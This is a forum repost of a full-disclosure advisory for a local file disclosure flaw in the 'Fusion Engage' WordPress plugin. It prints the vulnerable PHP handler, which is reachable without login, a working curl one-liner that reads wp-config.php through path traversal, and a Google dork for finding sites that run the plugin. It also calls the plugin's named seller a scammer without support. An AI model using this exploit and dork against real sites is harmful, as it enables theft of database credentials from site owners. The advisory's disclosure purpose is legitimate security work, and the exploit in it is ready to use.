Jump to content
KhiZaRix

WordPress Fusion Engage Local File Disclosure

Recommended Posts

Posted

Fusion Engage is a commercial wordpress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding.

Anyway, it has a LFD. Here's the relevant code..

function fe_get_sv_html(){

global $wpdb, $video_db, $ann_db;

print(file_get_contents($_POST['video']));

wp_die();

}add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');

So, you can exploit it easily... quick curl one-liner to get wp-config.php:

curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"

Precious Ngwu cares not at all about support, and last time I found security issues in his products he did not reply to me whatsoever. So, full disclosure on this one straight away, maybe someone else can contact him and "convince" him to put out an update, all I say to that is: good luck...

Quick google dork: inurl:plugins inurl:fusion-engage

- slipstream/raylee - twitter: @Thewack0lian

Source: http://packetstorm.wowhacker.com/1504-exploits/wpfusionengage-disclose.txt

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...